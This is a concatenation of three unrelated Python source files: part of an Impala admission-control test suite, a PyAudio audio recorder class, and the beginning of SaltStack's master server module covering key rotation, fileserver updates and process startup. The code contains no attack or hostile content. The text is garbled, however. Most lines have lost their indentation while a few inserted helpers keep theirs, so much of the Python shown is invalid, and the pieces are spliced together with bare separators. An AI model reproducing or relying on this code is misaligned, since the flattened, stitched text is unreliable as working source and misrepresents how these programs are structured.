assert metric_deltas['queued'] <= MAX_NUM_QUEUED_QUERIES * len(self.impalads),\
"Queued too many queries: at least one daemon queued too many"
assert metric_deltas['rejected'] + metric_deltas['admitted'] +\
metric_deltas['queued'] == num_queries,\
"Initial admission decisions don't add up to {0}: {1}".format(
num_queries, str(metric_deltas))
initial_metric_deltas = metric_deltas
# Like above, check that the count from the queries webpage json is reasonable.
queries_page_num_queued = self._get_queries_page_num_queued()
assert queries_page_num_queued >=\
min(num_queries - metric_deltas['admitted'], MAX_NUM_QUEUED_QUERIES)
assert queries_page_num_queued <= MAX_NUM_QUEUED_QUERIES * len(self.impalads)
self._check_queries_page_resource_pools()
# Admit queries in waves until all queries are done. A new wave of admission
# is started by killing some of the running queries.
while len(self.executing_threads) > 0:
curr_metrics = self.get_consistent_admission_metrics(num_queries)
log_metrics("Main loop, curr_metrics: ", curr_metrics)
num_to_end = len(self.executing_threads)
LOG.info("Main loop, will request %s queries to end", num_to_end)
self.end_admitted_queries(num_to_end)
self.wait_for_metric_changes(['released'], curr_metrics, num_to_end)
num_queued_remaining =\
curr_metrics['queued'] - curr_metrics['dequeued'] - curr_metrics['timed-out']
expected_admitted = min(num_queued_remaining, MAX_NUM_CONCURRENT_QUERIES)
(metric_deltas, _) = self.wait_for_metric_changes(
['admitted', 'timed-out'], curr_metrics, expected_admitted)
# The queue timeout is set high for these tests, so we don't expect any queries to
# time out.
assert metric_deltas['admitted'] >= expected_admitted
assert metric_deltas['timed-out'] == 0
self.wait_for_admitted_threads(metric_deltas['admitted'])
# Wait a few topic updates to ensure the admission controllers have reached a steady
# state or we may find an impalad dequeue more requests after we capture metrics.
self.wait_for_statestore_updates(10)
final_metrics = self.get_consistent_admission_metrics(num_queries)
log_metrics("Final metrics: ", final_metrics)
metric_deltas = compute_metric_deltas(final_metrics, initial_metrics)
assert metric_deltas['timed-out'] == 0
if round_robin_submission:
min_expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] >= min_expected_admitted
assert metric_deltas['admitted'] <= min_expected_admitted * len(self.impalads)
assert metric_deltas['admitted'] ==\
initial_metric_deltas['admitted'] + initial_metric_deltas['queued']
assert metric_deltas['queued'] == initial_metric_deltas['queued']
assert metric_deltas['rejected'] == initial_metric_deltas['rejected']
else:
# We shouldn't go over the max number of queries or queue size so we can compute
# the expected number of queries that should have been admitted (which includes the
# number queued as they eventually get admitted as well), queued, and rejected
expected_admitted = MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES
assert metric_deltas['admitted'] == expected_admitted
assert metric_deltas['queued'] == MAX_NUM_QUEUED_QUERIES
assert metric_deltas['rejected'] == num_queries - expected_admitted
# All queries should be completed by now.
queries_page_num_queued = self._get_queries_page_num_queued()
assert queries_page_num_queued == 0
self._check_queries_page_resource_pools()
for thread in self.all_threads:
if thread.error is not None:
raise thread.error
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=MAX_NUM_CONCURRENT_QUERIES,
max_queued=MAX_NUM_QUEUED_QUERIES, pool_max_mem=-1, queue_wait_timeout_ms=600000),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_flags(self, vector):
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
self.pool_name = 'default-pool'
# The pool has no mem resources set, so submitting queries with huge mem_limits
# should be fine. This exercises the code that does the per-pool memory
# accounting (see MemTracker::GetPoolMemReserved()) without actually being throttled.
self.run_admission_test(vector, {'request_pool': self.pool_name,
'mem_limit': sys.maxint})
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml"),
statestored_args=_STATESTORED_ARGS)
def test_admission_controller_with_configs(self, vector):
self.pool_name = 'root.queueB'
self.run_admission_test(vector, {'request_pool': self.pool_name})
def get_proc_limit(self):
"""Gets the process mem limit as reported by the impalad's mem-tracker metric.
Raises an assertion if not all impalads have the same value."""
limit_metrics = []
for impalad in self.cluster.impalads:
limit_metrics.append(impalad.service.get_metric_value("mem-tracker.process.limit"))
assert limit_metrics[0] == limit_metrics[-1],\
"Not all impalads have the same process limit: %s" % (limit_metrics,)
assert limit_metrics[0] is not None
return limit_metrics[0]
@pytest.mark.execute_serially
@SkipIfOS.redhat6
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(
max_requests=MAX_NUM_CONCURRENT_QUERIES * 30, max_queued=MAX_NUM_QUEUED_QUERIES,
pool_max_mem=MEM_TEST_LIMIT, proc_mem_limit=MEM_TEST_LIMIT,
queue_wait_timeout_ms=600000),
statestored_args=_STATESTORED_ARGS)
def test_mem_limit(self, vector):
# Impala may set the proc mem limit lower than we think depending on the overcommit
# settings of the OS. It should be fine to continue anyway.
proc_limit = self.get_proc_limit()
if proc_limit != MEM_TEST_LIMIT:
LOG.info("Warning: Process mem limit %s is not expected val %s", proc_limit,
MEM_TEST_LIMIT)
self.pool_name = 'default-pool'
# Each query mem limit (set the query option to override the per-host memory
# estimate) should use a bit less than (total pool mem limit) / #queries so that
# once #queries are running, the total pool mem usage is about at the limit and
# additional incoming requests will be rejected. The actual pool limit on the number
# of running requests is very high so that requests are only queued/rejected due to
# the mem limit.
num_impalads = len(self.cluster.impalads)
query_mem_limit = (proc_limit / MAX_NUM_CONCURRENT_QUERIES / num_impalads) - 1
self.run_admission_test(vector,
{'request_pool': self.pool_name, 'mem_limit': query_mem_limit})
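# Worked example of the sizing logic in test_mem_limit() above, with illustrative
# numbers only (the real MEM_TEST_LIMIT, MAX_NUM_CONCURRENT_QUERIES and cluster
# size are defined earlier in this file): with a 12 GiB process limit, 5
# concurrent queries and 3 impalads, each query is capped just under
# 12 GiB / 5 / 3 ~= 819 MiB, so once 5 queries are running the pool memory is
# essentially exhausted and further queries are queued or rejected on memory alone.
def _example_query_mem_limit(proc_limit_bytes, max_concurrent, num_impalads):
  """Illustrative sketch of the per-query mem_limit computed in test_mem_limit."""
  return (proc_limit_bytes // max_concurrent // num_impalads) - 1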
|
audio.py
|
# -*- coding: utf-8 -*-
import os
import sys
from threading import Thread, Lock
from pyaudio import PyAudio, paInt16
import config as conf
class AudioRecorder:
def __init__(self, rate):
self.pa = PyAudio()
self.stream = self.pa.open(
format = paInt16,
channels = 1,
rate = rate,
input = True,
frames_per_buffer = conf.block_size
)
self.stream.stop_stream()
self.rate = rate
self.format = paInt16
def __enter__(self, *args):
return self
def __exit__(self, *args):
self.close()
def start_recording(self):
self.lock = Lock()
self._do_stop_recording = False
        # Accumulate audio blocks on a background thread until finish_recording()
        # asks it to stop; 'self' is passed explicitly via Thread(args=(self,)).
        def record_func(self):
data = b''
while True:
with self.lock:
if self._do_stop_recording:
break
data += self.record(conf.block_size)
with self.lock:
self._do_stop_recording = False
self._recorded_data = data
self._recorder_thread = Thread(target=record_func, args=(self,))
self._recorder_thread.daemon = True
self._recorder_thread.start()
    def finish_recording(self):
        # Ask the recorder thread to stop, wait for it, and return the captured bytes.
        with self.lock:
            self._do_stop_recording = True
        self._recorder_thread.join()
        return self._recorded_data
def record(self, length):
self.stream.start_stream()
data = self.stream.read(length)
self.stream.stop_stream()
return data
    def bytes_to_numseq(self, b):
        # Decode raw little-endian PCM bytes into a sequence of signed integer samples.
size = self.pa.get_sample_size(self.format)
i = 0
while i < len(b):
yield int.from_bytes(b[i : i+size], signed=True, byteorder='little')
i += size
def close(self):
self.stream.close()
self.pa.terminate()
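# A minimal usage sketch (assumptions: config.block_size is set, a 16 kHz sample
# rate is acceptable, and recording for a fixed wall-clock duration is fine; this
# guard block is illustrative and not part of the recorder API):
if __name__ == '__main__':
    import time
    with AudioRecorder(rate=16000) as recorder:
        recorder.start_recording()
        time.sleep(2)  # capture roughly two seconds of audio
        raw = recorder.finish_recording()
        samples = list(recorder.bytes_to_numseq(raw))
        print('captured %d samples' % len(samples))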
|
master.py
|
# -*- coding: utf-8 -*-
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
from __future__ import absolute_import, with_statement, print_function, unicode_literals
import copy
import ctypes
import os
import re
import sys
import time
import errno
import signal
import stat
import logging
import collections
import multiprocessing
import threading
import salt.serializers.msgpack
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
# pylint: enable=import-error,no-name-in-module,redefined-builtin
import tornado.gen # pylint: disable=F0401
# Import salt libs
import salt.crypt
import salt.client
import salt.client.ssh.client
import salt.exceptions
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.key
import salt.acl
import salt.engines
import salt.daemons.masterapi
import salt.defaults.exitcodes
import salt.transport.server
import salt.log.setup
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.gitfs
import salt.utils.gzip_util
import salt.utils.jid
import salt.utils.job
import salt.utils.master
import salt.utils.minions
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.stringutils
import salt.utils.user
import salt.utils.verify
import salt.utils.zeromq
from salt.config import DEFAULT_INTERVAL
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.transport import iter_transport_opts
from salt.utils.debug import (
enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack
)
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
try:
import resource
HAS_RESOURCE = True
except ImportError:
# resource is not available on windows
HAS_RESOURCE = False
# Import halite libs
try:
import halite # pylint: disable=import-error
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
log = logging.getLogger(__name__)
class SMaster(object):
'''
Create a simple salt-master, this will generate the top-level master
'''
secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION}
def __init__(self, opts):
'''
Create a salt master server instance
:param dict opts: The salt options dictionary
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.opts = state['opts']
self.master_key = state['master_key']
self.key = state['key']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {'opts': self.opts,
'master_key': self.master_key,
'key': self.key,
'secrets': SMaster.secrets}
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
return salt.daemons.masterapi.access_keys(self.opts)
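# Illustrative sketch (hypothetical helper, not called anywhere in salt) of why
# SMaster defines __getstate__/__setstate__: with Windows' spawn-based
# multiprocessing the child re-imports this module and starts with an empty
# SMaster.secrets, so the secrets have to travel inside the pickled state and be
# restored on the other side.
def _example_smaster_state_roundtrip(smaster):
    '''
    Round-trip an SMaster through its pickling hooks, the way a spawned child
    process effectively does, and return the reconstructed instance.
    '''
    state = smaster.__getstate__()      # includes 'secrets'
    clone = SMaster.__new__(SMaster)    # what unpickling effectively does
    clone.__setstate__(state)           # repopulates SMaster.secrets as well
    return clone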
class Maintenance(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A generalized maintenance process which performs maintenance routines.
'''
def __init__(self, opts, **kwargs):
'''
Create a maintenance instance
:param dict opts: The salt options
'''
super(Maintenance, self).__init__(**kwargs)
self.opts = opts
# How often do we perform the maintenance tasks
self.loop_interval = int(self.opts['loop_interval'])
# Track key rotation intervals
self.rotate = int(time.time())
# A serializer for general maint operations
self.serial = salt.payload.Serial(self.opts)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _post_fork_init(self):
'''
Some things need to be init'd after the fork has completed
The easiest example is that one of these module types creates a thread
in the parent process, then once the fork happens you'll start getting
errors like "WARNING: Mixing fork() and threads detected; memory leaked."
'''
# Load Runners
ropts = dict(self.opts)
ropts['quiet'] = True
runner_client = salt.runner.RunnerClient(ropts)
# Load Returners
self.returners = salt.loader.returners(self.opts, {})
# Init Scheduler
self.schedule = salt.utils.schedule.Schedule(self.opts,
runner_client.functions_dict(),
returners=self.returners)
self.ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Init any values needed by the git ext pillar
self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts)
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if not tcp_only:
# For a TCP only transport, the presence events will be
# handled in the transport code.
self.presence_events = True
def run(self):
'''
This is the general passive maintenance process controller for the Salt
master.
This is where any data that needs to be cleanly maintained from the
master is maintained.
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# init things that need to be done after the process is forked
self._post_fork_init()
# Make Start Times
last = int(time.time())
old_present = set()
while True:
now = int(time.time())
if (now - last) >= self.loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
salt.daemons.masterapi.clean_pub_auth(self.opts)
self.handle_git_pillar()
self.handle_schedule()
self.handle_key_cache()
self.handle_presence(old_present)
self.handle_key_rotate(now)
salt.utils.verify.check_max_open_files(self.opts)
last = now
time.sleep(self.loop_interval)
def handle_key_cache(self):
'''
Evaluate accepted keys and create a msgpack file
which contains a list
'''
if self.opts['key_cache'] == 'sched':
keys = []
#TODO DRY from CKMinions
if self.opts['transport'] in ('zeromq', 'tcp'):
acc = 'minions'
else:
acc = 'accepted'
for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)):
if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)):
keys.append(fn_)
log.debug('Writing master key cache')
# Write a temporary file securely
with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file:
self.serial.dump(keys, cache_file)
def handle_key_rotate(self, now):
'''
        Rotate the AES key if the rotation drop file is present or the publish_session interval has elapsed
'''
to_rotate = False
dfn = os.path.join(self.opts['cachedir'], '.dfn')
try:
stats = os.stat(dfn)
# Basic Windows permissions don't distinguish between
# user/group/all. Check for read-only state instead.
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
to_rotate = True
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
elif stats.st_mode == 0o100400:
to_rotate = True
else:
log.error('Found dropfile with incorrect permissions, ignoring...')
os.remove(dfn)
except os.error:
pass
if self.opts.get('publish_session'):
if now - self.rotate >= self.opts['publish_session']:
to_rotate = True
if to_rotate:
log.info('Rotating master AES key')
for secret_key, secret_map in six.iteritems(SMaster.secrets):
# should be unnecessary-- since no one else should be modifying
with secret_map['secret'].get_lock():
secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']())
self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key')
self.rotate = now
if self.opts.get('ping_on_rotate'):
# Ping all minions to get them to pick up the new key
log.debug('Pinging all connected minions '
'due to key rotation')
salt.utils.master.ping_all_connected_minions(self.opts)
def handle_git_pillar(self):
'''
Update git pillar
'''
try:
for pillar in self.git_pillar:
pillar.fetch_remotes()
except Exception as exc:
log.error('Exception caught while updating git_pillar',
exc_info=True)
def handle_schedule(self):
'''
Evaluate the scheduler
'''
try:
self.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if self.schedule.loop_interval < self.loop_interval:
self.loop_interval = self.schedule.loop_interval
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
def handle_presence(self, old_present):
'''
Fire presence events if enabled
'''
if self.presence_events:
present = self.ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {'new': list(new),
'lost': list(lost)}
self.event.fire_event(data, tagify('change', 'presence'))
data = {'present': list(present)}
# On the first run it may need more time for the EventPublisher
# to come up and be ready. Set the timeout to account for this.
self.event.fire_event(data, tagify('present', 'presence'), timeout=3)
old_present.clear()
old_present.update(present)
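# Illustrative sketch (hypothetical helper, not used by the master) of the two
# rotation triggers Maintenance.handle_key_rotate() checks above, ignoring the
# Windows read-only special case: a drop file restricted to mode 0400, or the
# configured publish_session interval elapsing.
def _example_should_rotate_key(dropfile_mode, now, last_rotate, publish_session):
    dropfile_requests_rotation = (dropfile_mode is not None
                                  and stat.S_IMODE(dropfile_mode) == 0o400)
    session_expired = bool(publish_session) and now - last_rotate >= publish_session
    return dropfile_requests_rotation or session_expired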
class FileserverUpdate(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A process from which to update any dynamic fileserver backends
'''
def __init__(self, opts, log_queue=None):
super(FileserverUpdate, self).__init__(log_queue=log_queue)
self.opts = opts
self.update_threads = {}
# Avoid circular import
import salt.fileserver
self.fileserver = salt.fileserver.Fileserver(self.opts)
self.fill_buckets()
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(state['opts'], log_queue=state['log_queue'])
def __getstate__(self):
return {'opts': self.opts,
'log_queue': self.log_queue}
def fill_buckets(self):
'''
Get the configured backends and the intervals for any backend which
supports them, and set up the update "buckets". There will be one
bucket for each thing being updated at a given interval.
'''
update_intervals = self.fileserver.update_intervals()
self.buckets = {}
for backend in self.fileserver.backends():
fstr = '{0}.update'.format(backend)
try:
update_func = self.fileserver.servers[fstr]
except KeyError:
log.debug(
                    'No update function for the %s fileserver backend',
backend
)
continue
if backend in update_intervals:
# Variable intervals are supported for this backend
for id_, interval in six.iteritems(update_intervals[backend]):
if not interval:
# Don't allow an interval of 0
interval = DEFAULT_INTERVAL
log.debug(
'An update_interval of 0 is not supported, '
'falling back to %s', interval
)
i_ptr = self.buckets.setdefault(interval, OrderedDict())
# Backend doesn't technically need to be present in the
# key, all we *really* need is the function reference, but
# having it there makes it easier to provide meaningful
# debug logging in the update threads.
i_ptr.setdefault((backend, update_func), []).append(id_)
else:
# Variable intervals are not supported for this backend, so
# fall back to the global interval for that fileserver. Since
# this backend doesn't support variable updates, we have
# nothing to pass to the backend's update func, so we'll just
# set the value to None.
try:
interval_key = '{0}_update_interval'.format(backend)
interval = self.opts[interval_key]
except KeyError:
interval = DEFAULT_INTERVAL
log.error(
'%s key missing from master configuration. This is '
'a bug, please report it. Falling back to default '
'interval of %d seconds', interval_key, interval
)
self.buckets.setdefault(
interval, OrderedDict())[(backend, update_func)] = None
def update_fileserver(self, interval, backends):
'''
Threading target which handles all updates for a given wait interval
'''
def _do_update():
log.debug(
'Performing fileserver updates for items with an update '
'interval of %d', interval
)
for backend, update_args in six.iteritems(backends):
backend_name, update_func = backend
try:
if update_args:
log.debug(
'Updating %s fileserver cache for the following '
'targets: %s', backend_name, update_args
)
args = (update_args,)
else:
log.debug('Updating %s fileserver cache', backend_name)
args = ()
update_func(*args)
except Exception as exc:
log.exception(
'Uncaught exception while updating %s fileserver '
'cache', backend_name
)
log.debug(
'Completed fileserver updates for items with an update '
'interval of %d, waiting %d seconds', interval, interval
)
condition = threading.Condition()
_do_update()
while True:
with condition:
condition.wait(interval)
_do_update()
def run(self):
'''
Start the update threads
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
for interval in self.buckets:
self.update_threads[interval] = threading.Thread(
target=self.update_fileserver,
args=(interval, self.buckets[interval]),
)
self.update_threads[interval].start()
# Keep the process alive
while True:
time.sleep(60)
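# Illustrative sketch (hypothetical helper, not used by the master): the shape of
# the buckets mapping FileserverUpdate.fill_buckets() builds, here for an imagined
# config with two gitfs remotes updating every 60 seconds and the roots backend on
# the global default interval. The real values hold the update function object
# itself (shown below as placeholder strings); run() starts one thread per
# interval key.
def _example_fileserver_buckets():
    return {
        60: OrderedDict([(('gitfs', '<gitfs.update>'), ['remote_a', 'remote_b'])]),
        DEFAULT_INTERVAL: OrderedDict([(('roots', '<roots.update>'), None)]),
    }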
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
        :param dict opts: The salt options
'''
if zmq and ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
SMaster.__init__(self, opts)
def __set_max_open_files(self):
if not HAS_RESOURCE:
return
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
            # Unclear what to do with infinity... macOS reports RLIM_INFINITY as the
            # hard limit, but raising to anything above the soft limit fails...
mof_h = mof_s
log.info(
'Current values for max open files soft/hard setting: %s/%s',
mof_s, mof_h
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
'The value for the \'max_open_files\' setting, %s, is higher '
'than the highest value the user running salt is allowed to '
'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info('Raising max open files value to %s', mof_c)
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'New values for max open files soft/hard values: %s/%s',
mof_s, mof_h
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under macOS reported that our 100000 default value is
# still too high.
log.critical(
'Failed to raise max open files setting to %s. If this '
'value is too low, the salt-master will most likely fail '
'to run properly.', mof_c
)
def _pre_flight(self):
'''
Run pre flight checks. If anything in this method fails then the master
should not start up.
'''
errors = []
critical_errors = []
try:
os.chdir('/')
except OSError as err:
errors.append(
'Cannot change to root directory ({0})'.format(err)
)
if self.opts.get('fileserver_verify_config', True):
# Avoid circular import
import salt.fileserver
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
'Failed to load fileserver backends, the configured backends '
'are: {0}'.format(', '.join(self.opts['fileserver_backend']))
)
else:
# Run init() for all backends which support the function, to
# double-check configuration
try:
fileserver.init()
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append('{0}'.format(exc))
if not self.opts['fileserver_backend']:
errors.append('No fileserver backends are configured')
# Check to see if we need to create a pillar cache dir
if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')):
try:
with salt.utils.files.set_umask(0o077):
os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache'))
except OSError:
pass
if self.opts.get('git_pillar_verify_config', True):
git_pillars = [
x for x in self.opts.get('ext_pillar', [])
if 'git' in x
and not isinstance(x['git'], six.string_types)
]
if git_pillars:
try:
new_opts = copy.deepcopy(self.opts)
import salt.pillar.git_pillar
for repo in git_pillars:
new_opts['ext_pillar'] = [repo]
try:
git_pillar = salt.utils.gitfs.GitPillar(
new_opts,
repo['git'],
per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES,
per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY,
global_only=salt.pillar.git_pillar.GLOBAL_ONLY)
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append(exc.strerror)
finally:
del new_opts
if errors or critical_errors:
for error in errors:
log.error(error)
for error in critical_errors:
log.critical(error)
log.critical('Master failed pre flight checks, exiting\n')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
def start(self):
'''
Turn on the master server components
'''
self._pre_flight()
log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user())
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
# Setup the secrets here because the PubServerChannel may need
# them as well.
SMaster.secrets['aes'] = {
'secret': multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
)
),
'reload': salt.crypt.Crypticle.generate_key_string
}
log.info('Creating master process manager')
# Since there are children having their own ProcessManager we should wait for kill more time.
self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5)
pub_channels = []
log.info('Creating master publisher process')
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
pub_channels.append(chan)
log.info('Creating master event publisher process')
self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,))
if self.opts.get('reactor'):
if isinstance(self.opts['engines'], list):
rine = False
for item in self.opts['engines']:
if 'reactor' in item:
rine = True
break
if not rine:
self.opts['engines'].append({'reactor': {}})
else:
if 'reactor' not in self.opts['engines']:
log.info('Enabling the reactor engine')
self.opts['engines']['reactor'] = {}
salt.engines.start_engines(self.opts, self.process_manager)
# must be after channels
log.info('Creating master maintenance process')
self.process_manager.add_process(Maintenance, args=(self.opts,))
if self.opts.get('event_return'):
log.info('Creating master event return process')
self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,))
ext_procs = self.opts.get('ext_processes', [])
for proc in ext_procs:
log.info('Creating ext_processes process: %s', proc)
try:
mod = '.'.join(proc.split('.')[:-1])
cls = proc.split('.')[-1]
_tmp = __import__(mod, globals(), locals(), [cls], -1)
cls = _tmp.__getattribute__(cls)
self.process_manager.add_process(cls, args=(self.opts,))
except Exception:
log.error('Error creating ext_processes process: %s', proc)
if HAS_HALITE and 'halite' in self.opts:
log.info('Creating master halite process')
self.process_manager.add_process(Halite, args=(self.opts['halite'],))
# TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there)
if self.opts['con_cache']:
log.info('Creating master concache process')
self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,))
# workaround for issue #16315, race condition
log.debug('Sleeping for two seconds to let concache rest')
time.sleep(2)
log.info('Creating master request server process')
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = salt.log.setup.get_multiprocessing_logging_queue()
kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level()
kwargs['secrets'] = SMaster.secrets
self.process_manager.add_process(
ReqServer,
args=(self.opts, self.key, self.master_key),
kwargs=kwargs,
name='ReqServer')
self.process_manager.add_process(
FileserverUpdate,
args=(self.opts,))
# Fire up SSDP discovery publisher
if self.opts['discovery']:
if salt.utils.ssdp.SSDPDiscoveryServer.is_available():
self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer(
port=self.opts['discovery']['port'],
listen_ip=self.opts['interface'],
answer={'mapping': self.opts['discovery'].get('mapping', {})}).run)
else:
log.error('Unable to load SSDP: asynchronous IO is not available.')
if sys.version_info.major == 2:
log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.')
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
self.process_manager.run()
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
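# Illustrative sketch (hypothetical helper, not used by the master): how the
# 'aes' entry that Master.start() places in SMaster.secrets is read, mirroring
# the locking Maintenance.handle_key_rotate() takes when it rewrites the key
# from another process.
def _example_current_aes_key():
    secret = SMaster.secrets['aes']['secret']
    with secret.get_lock():
        return secret.value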
class Halite(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Manage the Halite server
'''
def __init__(self, hopts, **kwargs):
'''
Create a halite instance
:param dict hopts: The halite options
'''
super(Halite, self).__init__(**kwargs)
self.hopts = hopts
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['hopts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'hopts': self.hopts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def run(self):
'''
Fire up halite!
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class ReqServer(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, key, mkey, secrets=None, **kwargs):
'''
Create a request server
:param dict opts: The salt options dictionary
        :param dict key: The user starting the server and the AES key
        :param dict mkey: The user starting the server and the RSA key
:rtype: ReqServer
:returns: Request server
'''
super(ReqServer, self).__init__(**kwargs)
self.opts = opts
self.master_key = mkey
# Prepare the AES key
self.key = key
self.secrets = secrets
